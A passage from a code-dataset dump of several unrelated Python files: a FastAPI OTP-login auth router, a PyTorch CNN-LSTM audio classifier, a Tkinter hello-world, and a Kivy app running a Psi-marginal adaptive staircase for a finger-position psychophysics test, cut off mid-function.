sqlalchemy.orm import Session\nfrom model import *\nfrom schemas import OtpSchema, UserSchema, LoginSchema\nfrom fastapi_jwt_auth import AuthJWT\nfrom fastapi_mail import FastMail, MessageSchema\nfrom .email_conf import conf\nfrom db import SessionLocal\nimport random\nfrom starlette.requests import Request\nfrom datetime import datetime,timedelta\n\nauth_router=APIRouter(\n prefix='/auth',\n tags=['auth']\n)\n\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n@auth_router.get('/')\nasync def hello(Authorize:AuthJWT=Depends()):\n\n try:\n Authorize.jwt_required()\n\n except Exception as e:\n raise HTTPException(status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid Token\"\n )\n\n return {\"message\":\"Hello World\"}\n\n@auth_router.post(\"/register\", status_code = status.HTTP_201_CREATED )\ndef register_user(user:UserSchema, db: Session = Depends(get_db)):\n db_email=db.query(User).filter(User.email==user.email).first()\n\n if db_email is not None:\n return HTTPException(status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"User with the email already exists\"\n )\n\n db_username=db.query(User).filter(User.username==user.username).first()\n\n if db_username is not None:\n return HTTPException(status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"User with the username already exists\"\n )\n\n db_number=db.query(User).filter(User.phone_number==user.phone_number).first()\n if db_number is not None:\n return HTTPException(status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"User with the number already exists\"\n )\n\n new_user = User(username = user.username, email= user.email, name = user.name, phone_number = user.phone_number)\n db.add(new_user)\n db.commit()\n return HTTPException(status_code=status.HTTP_201_CREATED,\n detail=\"User Created\"\n )\n\n@auth_router.get(\"/user/{username}\")\ndef get_user(username:str, db: Session = Depends(get_db)):\n if username:\n user = db.query(User).filter(User.username==username).first()\n db.close() \n if user:\n return user\n else:\n raise HTTPException(status_code=404, detail=\"User not found\")\n\n@auth_router.get(\"/users/\")\ndef get_users(skip: int = 0, limit: int = 100, db: Session = Depends(get_db)):\n users = db.query(User).offset(skip).limit(limit).all()\n if users is None:\n raise HTTPException(status_code=404, detail=\"User not found\")\n return users\n\n@auth_router.post(\"/login\", status_code=status.HTTP_200_OK)\nasync def send_otp(user:LoginSchema,request: Request,db: Session = Depends(get_db)):\n db_user = db.query(User).filter(User.email==user.email).first()\n if db_user is None:\n return HTTPException(status_code=status.HTTP_400_BAD_REQUEST,\n detail=\"User with this Email dose not exists\"\n )\n otp_value = str(random.randint(1000 , 9999))\n db_otp = db.query(Otp).filter(Otp.user_id ==db_user.user_id)\n otp_check = db_otp.first()\n if otp_check:\n db_otp.update({\"otp\":otp_value,\"otp_exp\":datetime.now() + timedelta(minutes=5)})\n db.commit()\n else:\n db_otp = Otp(otp=otp_value,otp_exp =datetime.now() + timedelta(minutes=5) ,user_id = db_user.user_id)\n # db_otp = Otp(otp=otp_value,user_id = db_user.user_id)\n db.add(db_otp)\n db.commit()\n if db_user:\n message = MessageSchema(\n subject=\"Fastapi-Mail module\",\n recipients=[user.email],\n body=f\"Your otp is {otp_value}\",\n subtype=\"html\"\n ) \n fm = FastMail(conf)\n await fm.send_message(message)\n print(message)\n request.session[\"email\"] = user.dict().get('email')\n return HTTPException(status_code=status.HTTP_200_OK,\n detail={\"data\":\"email sended\",\"email\":user.email}\n )\n\n@auth_router.post(\"/verify\", status_code=200)\nasync def login(otp:OtpSchema,request: Request, Authorize:AuthJWT=Depends(),db: Session = Depends(get_db),email: Union[str, None] = Header(default=None)):\n # email = request.session.get(\"email\", None)\n print(email)\n db_user = db.query(User).filter(User.email==email).first()\n db_otp = db.query(Otp).filter(Otp.user_id == db_user.user_id)\n otp_check = db_otp.first()\n if otp.otp != otp_check.otp:\n raise HTTPException(status_code=404, detail=\"Wrong OTP\")\n # if otp_check.otp_exp < datetime.now():\n # db_otp.update({\"otp\":None})\n # db.commit()\n # raise HTTPException(status_code=404, detail=\"otp Expired\")\n if otp_check:\n db_otp.update({\"otp\":None})\n db.commit()\n access_token=Authorize.create_access_token(subject=db_user.email)\n refresh_token=Authorize.create_refresh_token(subject=db_user.email)\n response={\n \"access\":access_token,\n \"refresh\":refresh_token\n }\n return HTTPException(status_code=status.HTTP_200_OK,\n detail= response\n )\n","repo_name":"tarun-brainerhub/python-samples","sub_path":"chat application backend (fastapi)/User/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":5100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"32933102243","text":"import torch\nimport torch.nn as nn\nimport torch.nn.init as init\nimport torch.nn.functional as F\nimport numpy as np\nimport math\nfrom resnet import resnet, ResNet, count_parameters, init_weights, device, test_tensor\n\n\nclass CNN(nn.Module):\n def __init__(self, out_num):\n super(CNN, self).__init__()\n\n self.layer1 = nn.Sequential(\n nn.Conv2d(in_channels=1, out_channels=8,\n kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(num_features=8),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2)\n )\n\n self.layer2 = nn.Sequential(\n nn.Conv2d(in_channels=8, out_channels=16,\n kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(num_features=16),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2)\n )\n\n self.layer3 = nn.Sequential(\n nn.Conv2d(in_channels=16, out_channels=32,\n kernel_size=3, stride=1, padding=1),\n nn.BatchNorm2d(num_features=32),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2)\n )\n\n self.lstm = nn.LSTM(input_size=16, hidden_size=16, batch_first=True)\n\n self.layer4 = nn.Sequential(\n nn.Conv2d(in_channels=32, out_channels=32,\n kernel_size=3, stride=1, padding=1),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2),\n nn.Dropout(0.5)\n )\n\n self.fc1 = nn.Sequential(\n nn.Linear(in_features=32*21*8, out_features=2048),\n nn.ReLU(inplace=True),\n nn.Dropout(0.5)\n )\n\n self.fc3 = nn.Linear(in_features=2048, out_features=out_num)\n\n self.dropout = nn.Dropout(0.5)\n self.activation = F.softmax\n\n def forward(self, x):\n out = self.layer1(x)\n out = self.layer2(out)\n out = self.layer3(out)\n\n out = out.view(-1, 43, 16)\n out, _ = self.lstm(out)\n\n out = out.contiguous().view(-1, 32, 43, 16)\n out = self.layer4(out)\n\n out = out.contiguous().view(out.size()[0], -1)\n out = self.fc1(out)\n out = self.fc3(out)\n out = self.activation(out, dim=1)\n\n return out\n\n\nclass OrchMatchNet(nn.Module):\n def __init__(self, out_num, model_select):\n super(OrchMatchNet, self).__init__()\n if model_select == 'cnn':\n self.net = CNN(out_num)\n elif model_select == 'resnet':\n self.net = ResNet(num_classes=out_num)\n\n def forward(self, x):\n out = self.net(x)\n\n return out\n\n\ncnn = CNN(out_num=505)\ninit_weights(cnn)\ncnn.to(device)\n\nprint(\"Network output shape:\")\nprint(cnn(test_tensor).shape)\n\ncount_parameters(cnn)\n","repo_name":"Waffle-Liu/DeepOrchestraion","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71459741111","text":"# GUI (Graphical User Interface)\n# Tkinter (TK Interface)\nimport tkinter as tk\nfrom tkinter import ttk\nimport os\n\ndef evento_click():\n boton1.config(text='Boton presionado')\n boton2 = ttk.Button(ventana, text='Nuevo boton')\n boton2.pack()\n print('Ejecucion del evento')\n\n# Crear objecto\nventana = tk.Tk()\n# MOdificar el tamaño de la ventana\nventana.geometry('800x500')\n# Cambiar el nombre de la ventana\nventana.title('Hola Mundo')\n# Cambiar icono\ndirecion = os.getcwd()\nventana.iconbitmap(direcion + '\\icono\\icono.ico')\n# Creacion de boton\nboton1 = ttk.Button(ventana, text='Boton de click', command=evento_click)\n# El pack layout manager muestra los objectos como botones\nboton1.pack()\n# Inicar ventana\nventana.mainloop()\n","repo_name":"KUSHIRO13/Universidad_Python_con_Frameworks_Django_Flask_etc_71hrs","sub_path":"Tkinters/hola_mundo.py","file_name":"hola_mundo.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"74093490548","text":"import math, time\nimport numpy as np\nfrom random import randrange\nfrom kivy.uix.screenmanager import Screen, ScreenManager, FadeTransition\nfrom kivy.core.window import Window\nfrom kivy.app import App\nfrom kivy.properties import ObjectProperty\nfrom kivy.uix.popup import Popup\nfrom kivy.uix.floatlayout import FloatLayout\nfrom kivy.storage.jsonstore import JsonStore\nfrom kivy import platform\nimport threading\n\nWindow.fullscreen = 'auto'\n\ndef cartesian(arrays, out=None):\n \"\"\"Generate a cartesian product of input arrays.\n\n Parameters\n -----------------\n arrays: list of array-like \n 1-D arrays to form the cartesian product of.\n out: ndarray\n Array to place the cartesian product in.\n\n Returns \n -----------------\n out: ndarray\n 2-D array of shape (M, len(arrays)) containing cartesian products\n formed of input arrays.\n\n \"\"\"\n arrays = [np.asarray(x) for x in arrays]\n shape = (len(x) for x in arrays)\n dtype = arrays[0].dtype\n\n ix = np.indices(shape)\n ix = ix.reshape(len(arrays), -1).T\n\n if out is None:\n out = np.empty_like(ix, dtype = dtype)\n\n for n, arr in enumerate(arrays):\n out[:, n] = arrays[n][ix[:,n]]\n\n return out\n\n\"\"\"\nCopyright © 2016, N. Niehof, Radboud University Nijmegen\n\nPsiMarginal is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nPsiMarginal is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with PsiMarginal. If not, see .\n\"\"\"\n\ndef pf(parameters, psyfun='cGauss'):\n \"\"\"Generate conditional probabilities from psychometric function.\n\n Arguments\n ---------\n parameters: ndarray (float64) containing parameters as columns\n mu : threshold\n\n sigma : slope\n\n gamma : guessing rate (optional), default is 0.2\n\n lambda : lapse rate (optional), default is 0.04\n\n x : stimulus intensity\n\n psyfun : type of psychometric function.\n 'cGauss' cumulative Gaussian\n\n 'Gumbel' Gumbel, aka log Weibull\n\n Returns\n -------\n 1D-array of conditional probabilities p(response | mu,sigma,gamma,lambda,x)\n \"\"\"\n\n # Unpack parameters\n if np.size(parameters, 1) == 5:\n [mu, sigma, gamma, llambda, x] = np.transpose(parameters)\n elif np.size(parameters, 1) == 4:\n [mu, sigma, llambda, x] = np.transpose(parameters)\n gamma = llambda\n elif np.size(parameters, 1) == 3:\n [mu, sigma, x] = np.transpose(parameters)\n gamma = 0.2\n llambda = 0.04\n else: # insufficient number of parameters will give a flat line\n psyfun = None\n gamma = 0.2\n llambda = 0.04\n # Psychometric function\n ones = np.ones(np.shape(mu))\n if psyfun == 'cGauss':\n # F(x; mu, sigma) = Normcdf(mu, sigma) = 1/2 * erfc(-sigma * (x-mu) /sqrt(2))\n z = np.divide(np.subtract(x, mu), sigma)\n p = 0.5 * np.array([math.erfc(-zi / np.sqrt(2)) for zi in z])\n elif psyfun == 'Gumbel':\n # F(x; mu, sigma) = 1 - exp(-10^(sigma(x-mu)))\n p = ones - np.exp(-np.power((np.multiply(ones, 10.0)), (np.multiply(sigma, (np.subtract(x, mu))))))\n elif psyfun == 'Weibull':\n # F(x; mu, sigma)\n p = 1 - np.exp(-(np.divide(x, mu)) ** sigma)\n else:\n # flat line if no psychometric function is specified\n p = np.ones(np.shape(mu))\n y = gamma + np.multiply((ones - gamma - llambda), p)\n return y\n\nclass Psi:\n \"\"\"Find the stimulus intensity with minimum expected entropy for each trial, to determine the psychometric function.\n\n Psi adaptive staircase procedure for use in psychophysics.\n\n Arguments\n ---------\n stimRange :\n range of possible stimulus intensities.\n\n Pfunction (str) : type of psychometric function to use.\n 'cGauss' cumulative Gaussian\n\n 'Gumbel' Gumbel, aka log Weibull\n\n nTrials :\n number of trials\n\n threshold :\n (alpha) range of possible threshold values to search\n\n thresholdPrior (tuple) : type of prior probability distribution to use.\n Also: slopePrior, guessPrior, lapsePrior.\n\n ('normal',0,1): normal distribution, mean and standard deviation.\n\n ('uniform',None) : uniform distribution, mean and standard deviation not defined.\n\n slope :\n (sigma) range of possible slope values to search\n\n slopePrior :\n see thresholdPrior\n\n guessRate :\n (gamma) range of possible guessing rate values to search\n\n guessPrior :\n see thresholdPrior\n\n lapseRate :\n (lambda) range of possible lapse rate values to search\n\n lapsePrior :\n see thresholdPrior\n\n marginalize (bool) :\n If True, marginalize out the lapse rate and guessing rate before finding the stimulus\n intensity of lowest expected entropy. This uses the Prins (2013) method to include the guessing and lapse rate\n into the probability disctribution. These rates are then marginalized out, and only the threshold and slope are included\n in selection of the stimulus intensity.\n\n If False, lapse rate and guess rate are included in the selection of stimulus intensity.\n\n How to use\n ----------\n Create a psi object instance with all relevant arguments. Selecting a correct search space for the threshold,\n slope, guessing rate and lapse rate is important for the psi procedure to function well. If an estimate for\n one of the parameters ends up at its (upper or lower) limit, the result is not reliable, and the procedure\n should be repeated with a larger search range for that parameter.\n\n Example:\n >>> s = range(-5,5) # possible stimulus intensities\n obj = Psi(s)\n\n The stimulus intensity to be used in the current trial can be found in the field xCurrent.\n\n Example:\n >>> stim = obj.xCurrent\n NOTE: if obj.xCurrent returns None, the calculation is not yet finished.\n This can be avoided by waiting until xCurrent has a numeric value, e.g.:\n >>> while obj.xCurrent == None:\n pass # hang in this loop until the psi calculation has finished\n stim = obj.xCurrent\n\n After each trial, update the psi staircase with the subject response, by calling the addData method.\n\n Example:\n >>> obj.addData(resp)\n \"\"\"\n\n def __init__(self, stimRange, Pfunction='cGauss', nTrials=50, threshold=None, thresholdPrior=('uniform', None),\n slope=None, slopePrior=('uniform', None),\n guessRate=None, guessPrior=('uniform', None), lapseRate=None, lapsePrior=('uniform', None),\n marginalize=True, thread=True):\n\n # Psychometric function parameters\n self.stimRange = stimRange # range of stimulus intensities\n self.version = 1.0\n self.threshold = np.arange(-10, 10, 0.1)\n self.slope = np.arange(0.005, 20, 0.1)\n self.guessRate = np.arange(0.0, 0.11, 0.05)\n self.lapseRate = np.arange(0.0, 0.11, 0.05)\n self.marginalize = marginalize # marginalize out nuisance parameters gamma and lambda?\n self.psyfun = Pfunction\n self.thread = thread\n\n if threshold is not None:\n self.threshold = threshold\n if np.shape(self.threshold) == ():\n self.threshold = np.expand_dims(self.threshold, 0)\n if slope is not None:\n self.slope = slope\n if np.shape(self.slope) == ():\n self.slope = np.expand_dims(self.slope, 0)\n if guessRate is not None:\n self.guessRate = guessRate\n if np.shape(self.guessRate) == ():\n self.guessRate = np.expand_dims(self.guessRate, 0)\n if lapseRate is not None:\n self.lapseRate = lapseRate\n if np.shape(self.lapseRate) == ():\n self.lapseRate = np.expand_dims(self.lapseRate, 0)\n\n # Priors\n self.thresholdPrior = thresholdPrior\n self.slopePrior = slopePrior\n self.guessPrior = guessPrior\n self.lapsePrior = lapsePrior\n\n self.priorMu = self.__genprior(self.threshold, *thresholdPrior)\n self.priorSigma = self.__genprior(self.slope, *slopePrior)\n self.priorGamma = self.__genprior(self.guessRate, *guessPrior)\n self.priorLambda = self.__genprior(self.lapseRate, *lapsePrior)\n\n # if guess rate equals lapse rate, and they have equal priors,\n # then gamma can be left out, as the distributions will be the same\n self.gammaEQlambda = all((all(self.guessRate == self.lapseRate), all(self.priorGamma == self.priorLambda)))\n # likelihood: table of conditional probabilities p(response | alpha,sigma,gamma,lambda,x)\n # prior: prior probability over all parameters p_0(alpha,sigma,gamma,lambda)\n if self.gammaEQlambda:\n self.dimensions = (len(self.threshold), len(self.slope), len(self.lapseRate), len(self.stimRange))\n self.likelihood = np.reshape(\n pf(cartesian((self.threshold, self.slope, self.lapseRate, self.stimRange)), psyfun=Pfunction), self.dimensions)\n # row-wise products of prior probabilities\n self.prior = np.reshape(\n np.prod(cartesian((self.priorMu, self.priorSigma, self.priorLambda)), axis=1), self.dimensions[:-1])\n else:\n self.dimensions = (len(self.threshold), len(self.slope), len(self.guessRate), len(self.lapseRate), len(self.stimRange))\n self.likelihood = np.reshape(\n pf(cartesian((self.threshold, self.slope, self.guessRate, self.lapseRate, self.stimRange)), psyfun=Pfunction), self.dimensions)\n # row-wise products of prior probabilities\n self.prior = np.reshape(\n np.prod(cartesian((self.priorMu, self.priorSigma, self.priorGamma, self.priorLambda)), axis=1), self.dimensions[:-1])\n\n # normalize prior\n self.prior = self.prior / np.sum(self.prior)\n\n # Set probability density function to prior\n self.pdf = np.copy(self.prior)\n\n # settings\n self.iTrial = 0\n self.nTrials = nTrials\n self.stop = 0\n self.response = []\n self.stim = []\n\n # Generate the first stimulus intensity\n self.minEntropyStim()\n\n def __genprior(self, x, distr='uniform', mu=0, sig=1):\n \"\"\"Generate prior probability distribution for variable.\n\n Arguments\n ---------\n x : 1D numpy array (float64)\n points to evaluate the density at.\n\n distr : string\n Distribution to use a prior :\n 'uniform' (default) discrete uniform distribution\n\n 'normal' normal distribution\n\n 'gamma' gamma distribution\n\n 'beta' beta distribution\n\n mu : scalar float\n first parameter of distr distribution (check scipy for parameterization)\n\n sig : scalar float\n second parameter of distr distribution\n\n Returns\n -------\n 1D numpy array of prior probabilities (unnormalized)\n \"\"\"\n if distr == 'uniform':\n nx = len(x)\n p = np.ones(nx) / nx\n elif distr == 'normal':\n p = np.exp(-(x-mu)**2 / (2.0*(sig)**2)) / np.sqrt(2.0*np.pi*(sig)**2)\n elif distr == 'beta':\n OnePx = (sig - 1.0) * np.log1p(-x) + (mu - 1.0) * np.log(x)\n beta = math.gamma(mu) * math.gamma(sig) / math.gamma(mu + sig)\n OnePx -= np.log(np.abs(beta))\n p = np.exp(OnePx)\n elif distr == 'gamma':\n p = x ** (mu - 1) * (np.exp(-x)) / math.gamma(sig)\n else:\n nx = len(x)\n p = np.ones(nx) / nx\n return p\n\n def meta_data(self):\n import time\n import sys\n metadata = {}\n date = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.gmtime(time.time()))\n metadata['date'] = date\n metadata['Version'] = self.version\n metadata['Python Version'] = sys.version\n metadata['Numpy Version'] = np.__version__\n metadata['Scipy Version '] = scipy.__version__\n metadata['psyFunction'] = self.psyfun\n metadata['thresholdGrid'] = self.threshold.tolist()\n metadata['thresholdPrior'] = self.thresholdPrior\n metadata['slopeGrid'] = self.slope.tolist()\n metadata['slopePrior'] = self.slopePrior\n metadata['gammaGrid'] = self.guessRate.tolist()\n metadata['gammaPrior'] = self.guessPrior\n metadata['lapseGrid'] = self.lapseRate.tolist()\n metadata['lapsePrior'] = self.lapsePrior\n return metadata\n\n def __entropy(self, pdf):\n \"\"\"Calculate shannon entropy of posterior distribution.\n Arguments\n ---------\n pdf : ndarray (float64)\n posterior distribution of psychometric curve parameters for each stimuli\n\n\n Returns\n -------\n 1D numpy array (float64) : Shannon entropy of posterior for each stimuli\n \"\"\"\n # Marginalize out all nuisance parameters, i.e. all except alpha and sigma\n postDims = np.ndim(pdf)\n if self.marginalize == True:\n while postDims > 3: # marginalize out second-to-last dimension, last dim is x\n pdf = np.sum(pdf, axis=-2)\n postDims -= 1\n # find expected entropy, suppress divide-by-zero and invalid value warnings\n # as this is handled by the NaN redefinition to 0\n with np.errstate(divide='ignore', invalid='ignore'):\n entropy = np.multiply(pdf, np.log(pdf))\n entropy[np.isnan(entropy)] = 0 # define 0*log(0) to equal 0\n dimSum = tuple(range(postDims - 1)) # dimensions to sum over. also a Chinese dish\n entropy = -(np.sum(entropy, axis=dimSum))\n return entropy\n\n def minEntropyStim(self):\n \"\"\"Find the stimulus intensity based on the expected information gain.\n\n Minimum Shannon entropy is used as selection criterion for the stimulus intensity in the upcoming trial.\n \"\"\"\n self.pdf = self.pdf\n self.nX = len(self.stimRange)\n self.nDims = np.ndim(self.pdf)\n\n # make pdf the same dims as conditional prob table likelihood\n self.pdfND = np.expand_dims(self.pdf, axis=self.nDims) # append new axis\n self.pdfND = np.tile(self.pdfND, (self.nX)) # tile along new axis\n\n # Probabilities of response r (succes, failure) after presenting a stimulus\n # with stimulus intensity x at the next trial, multiplied with the prior (pdfND)\n self.pTplus1success = np.multiply(self.likelihood, self.pdfND)\n self.pTplus1failure = self.pdfND - self.pTplus1success\n\n # Probability of success or failure given stimulus intensity x, p(r|x)\n self.sumAxes = tuple(range(self.nDims)) # sum over all axes except the stimulus intensity axis\n self.pSuccessGivenx = np.sum(self.pTplus1success, axis=self.sumAxes)\n self.pFailureGivenx = np.sum(self.pTplus1failure, axis=self.sumAxes)\n\n # Posterior probability of parameter values given stimulus intensity x and response r\n # p(alpha, sigma | x, r)\n self.posteriorTplus1success = self.pTplus1success / self.pSuccessGivenx\n self.posteriorTplus1failure = self.pTplus1failure / self.pFailureGivenx\n\n # Expected entropy for the next trial at intensity x, producing response r\n self.entropySuccess = self.__entropy(self.posteriorTplus1success)\n self.entropyFailure = self.__entropy(self.posteriorTplus1failure)\n self.expectEntropy = np.multiply(self.entropySuccess, self.pSuccessGivenx) + np.multiply(self.entropyFailure,\n self.pFailureGivenx)\n self.minEntropyInd = np.argmin(self.expectEntropy) # index of smallest expected entropy\n self.xCurrent = self.stimRange[self.minEntropyInd] # stim intensity at minimum expected entropy\n\n self.iTrial += 1\n if self.iTrial == (self.nTrials - 1):\n self.stop = 1\n\n def addData(self, response):\n \"\"\"\n Add the most recent response to start calculating the next stimulus intensity\n\n Arguments\n ---------\n response: (int)\n 1: correct/right\n\n 0: incorrect/left\n \"\"\"\n self.stim.append(self.xCurrent)\n self.response.append(response)\n\n self.xCurrent = None\n\n # Keep the posterior probability distribution that corresponds to the recorded response\n if response == 1:\n # select the posterior that corresponds to the stimulus intensity of lowest entropy\n self.pdf = self.posteriorTplus1success[Ellipsis, self.minEntropyInd]\n elif response == 0:\n self.pdf = self.posteriorTplus1failure[Ellipsis, self.minEntropyInd]\n\n # normalize the pdf\n self.pdf = self.pdf / np.sum(self.pdf)\n\n # Marginalized probabilities per parameter\n if self.gammaEQlambda:\n self.pThreshold = np.sum(self.pdf, axis=(1, 2))\n self.pSlope = np.sum(self.pdf, axis=(0, 2))\n self.pLapse = np.sum(self.pdf, axis=(0, 1))\n self.pGuess = self.pLapse\n else:\n self.pThreshold = np.sum(self.pdf, axis=(1, 2, 3))\n self.pSlope = np.sum(self.pdf, axis=(0, 2, 3))\n self.pLapse = np.sum(self.pdf, axis=(0, 1, 2))\n self.pGuess = np.sum(self.pdf, axis=(0, 1, 3))\n\n # Distribution means as expected values of parameters\n self.eThreshold = np.sum(np.multiply(self.threshold, self.pThreshold))\n self.eSlope = np.sum(np.multiply(self.slope, self.pSlope))\n self.eLapse = np.sum(np.multiply(self.lapseRate, self.pLapse))\n self.eGuess = np.sum(np.multiply(self.guessRate, self.pGuess))\n\n # Distribution std of parameters\n self.stdThreshold = np.sqrt(np.sum(np.multiply((self.threshold - self.eThreshold) ** 2, self.pThreshold)))\n self.stdSlope = np.sqrt(np.sum(np.multiply((self.slope - self.eSlope) ** 2, self.pSlope)))\n self.stdLapse = np.sqrt(np.sum(np.multiply((self.lapseRate - self.eLapse) ** 2, self.pLapse)))\n self.stdGuess = np.sqrt(np.sum(np.multiply((self.guessRate - self.eGuess) ** 2, self.pGuess)))\n\n # Start calculating the next minimum entropy stimulus\n \n if self.thread:\n threading.Thread(target=self.minEntropyStim).start()\n else:\n self.minEntropyStim()\n \n# This works on ubuntu, not on Windows\ntimestamp = time.strftime(\"%Y%m%d_%H:%M:%S\")\n\n# If running on a Windows PC, run the following\n# timestamp = time.strftime(\"%Y%m%d_%H_%M_%S\")\n\n# If running on an android device, set the right path to save the JSON file\nif platform == 'android':\n from jnius import autoclass, cast, JavaException\n\n try:\n PythonActivity = autoclass('org.kivy.android.PythonActivity')\n except JavaException:\n PythonActivity = autoclass('org.renpy.android.PythonActivity')\n\n Environment = autoclass('android.os.Environment')\n context = cast('android.content.Context', PythonActivity.mActivity)\n private_storage = context.getExternalFilesDir(Environment.getDataDirectory().getAbsolutePath()).getAbsolutePath()\n\n store = JsonStore(\".\".join([private_storage, timestamp, 'json']))\n\n# This is mainly for testing on a Linux Desktop\nelse:\n store = JsonStore(\".\".join([timestamp, 'json']))\n\n# Prepare dictionaries to save information\nsubj_info = {}\nsubj_anth = {}\nsubj_trial_info = {}\n\n# These are Psi-Marginal Staircase related parameters\n# mu = threshold parameter\n# sigma = slope parameter\n# StimLevels = delta angle\nntrials = 50\nmu = np.linspace(0, 15, 61)\nsigma = np.linspace(0.05, 1, 21)\nlapse = np.linspace(0, 0.1, 15)\nguessRate = 0.5\n# 5.0 degrees deviation means the exact spot of the center of an index finger - skipped\nstimLevels = np.concatenate((np.arange(0, 5, 0.1), np.arange(5.1, 10, 0.1), np.arange(10, 16, 1)))\n\nthresholdPrior = ('normal', 13, 3)\nslopePrior = ('gamma', 2, 0.3)\nlapsePrior = ('beta', 2, 20)\n\npsi_obj = Psi(stimLevels, Pfunction = 'Gumbel', nTrials = ntrials, threshold = mu, thresholdPrior = thresholdPrior, slope = sigma, slopePrior = slopePrior, guessRate = guessRate, guessPrior = ('uniform', None), lapseRate = lapse, lapsePrior = lapsePrior, marginalize = True)\n\nclass CalibrationScreen(Screen):\n\n # Popup window\n def show_popup(self):\n\n the_popup = CalibPopup(title = \"READ IT\", size_hint = (None, None), size = (400, 400))\n the_popup.open()\n\nclass CalibPopup(Popup):\n pass\n\nclass ParamPopup(Popup):\n pass\n\nclass ParamInputScreenOne(Screen):\n\n male = ObjectProperty(True)\n female = ObjectProperty(False)\n right = ObjectProperty(True)\n left = ObjectProperty(False)\n\n gender = ObjectProperty(None)\n handed_chk = ObjectProperty(False)\n\n # Popup window to check if everything is saved properly\n def show_popup(self):\n\n the_popup = ParamPopup(title = \"READ IT\", size_hint = (None, None), size = (400, 400))\n\n # Check if any of the parameter inputs is missing!\n if any([self.pid_text_input.text == \"\", self.age_text_input.text == \"\", self.gender == None, self.handed_chk == False]) is True:\n the_popup.argh.text = \"Value Missing!\"\n the_popup.open()\n else:\n global subid\n subid = \"_\".join([\"SUBJ\", self.pid_text_input.text])\n global subj_info\n subj_info = {'age' : self.age_text_input.text, 'gender' : self.gender, 'right_used' : self.ids.rightchk.active}\n self.parent.current = \"param_screen_two\"\n\n def if_active_m(self, state):\n if state:\n # Whill change the orientation of the testscreen's colorscreen\n self.gender = \"M\"\n\n def if_active_f(self, state):\n if state:\n self.gender = \"F\"\n\n def if_active_r(self, state):\n if state:\n # Will change the orientation of the testscreen's colorscreen\n self.parent.ids.testsc.handedness.dir = 1\n #self.parent.ids.testsc.handedness.degree = -35\n\n # Just for fool-proof\n self.handed_chk = True\n\n def if_active_l(self, state):\n if state:\n self.parent.ids.testsc.handedness.dir = -1\n #self.parent.ids.testsc.handedness.degree = 35\n\n # Just for fool-proof\n self.handed_chk = True\n\nclass ParamInputScreenTwo(Screen):\n\n # Popup window to check if everything is entered\n def show_popup2(self):\n\n the_popup = ParamPopup(title = \"READ IT\", size_hint = (None, None), size = (400, 400))\n\n # Check if any of the parameter inputs is missing!\n if any([self.flen_text_input.text == \"\", self.fwid_text_input.text == \"\", self.initd_text_input.text == \"\", self.mprad_text_input.text == \"\"]):\n the_popup.argh.text = \"Something's missing!\"\n the_popup.open()\n else:\n global subj_anth\n subj_anth = {'flen' : self.flen_text_input.text, 'fwid' : self.fwid_text_input.text, 'init_step' : self.initd_text_input.text, 'MPJR' : self.mprad_text_input.text}\n\n # Give the mp joint radius input to draw the test screen display\n self.parent.ids.testsc.handedness.mprad = self.mprad_text_input.text\n self.parent.current = \"test_screen\"\n\nclass TestScreen(Screen):\n\n handedness = ObjectProperty(None)\n\n def __init__(self, **kwargs):\n super(TestScreen, self).__init__(**kwargs)\n self.rgblist1 = [(1, 0, 0, 1), (1, 1, 0, 1), (0, 1, 0, 1)]\n self.rgblist2 = [(0, 0, 1, 1), (0.5, 0, 1, 1), (1, 0.56, 0.75, 1)]\n self.rgbindex = 0\n # checking if the reverse is happening\n self.prev_choice = list()\n # session number\n self.session_num = 0\n # check the trial number(within a session)\n self.trial_num = 0\n # Keep the record of total trials(regardless of session)\n self.trial_total = 0\n\n self.mov_angle = psi_obj.xCurrent\n\n # changes the color of the buttons as well as the screen\n def change_col_setting(self):\n rgb_index = randrange(0, 3, 1)\n while rgb_index == self.rgbindex:\n rgb_index = randrange(0, 3, 1)\n self.ids.cw.bg_color_after = self.rgblist1[rgb_index]\n self.ids.cw.bg_color_before = self.rgblist2[rgb_index]\n self.ids._more_left.background_normal = ''\n self.ids._more_left.background_color = self.ids.cw.bg_color_after\n self.ids._more_right.background_normal = ''\n self.ids._more_right.background_color = self.ids.cw.bg_color_before\n self.rgbindex = rgb_index\n\n # keep track of reversals\n def track_choices(self, response):\n self.prev_choice.append(response)\n\n def where_is_your_finger(self, rel_pos):\n\n # change the colors of the screen\n self.change_col_setting()\n\n # Add the current choice, check if reversal is happening\n self.track_choices(rel_pos)\n\n # Save the current degree\n degree_current = self.ids.cw.degree\n\n # Check if the respons('on the left' or 'on the right') is correct\n # Get the current third x-coordinate of the quadrilateral, or the fourth point of the quadrilateral\n # Compare it with the true third x-coordinate of the quadrilateral\n # If the current x-coordinate is greater than the true value, the correct answer should be \"left\"\n # If the current x-coordinate is smaller than the true value, the correct answer should be \"right\"\n # If neither, the response is \"on_the_spot\"\n x_coord_current = self.ids.cw.quad_points[4]\n if x_coord_current > self.ids.cw.x_correct:\n correct_ans = \"left\"\n elif x_coord_current < self.ids.cw.x_correct:\n correct_ans = \"right\"\n else:\n correct_ans = \"on_the_spot\"\n\n # Compare if the answer is correct\n 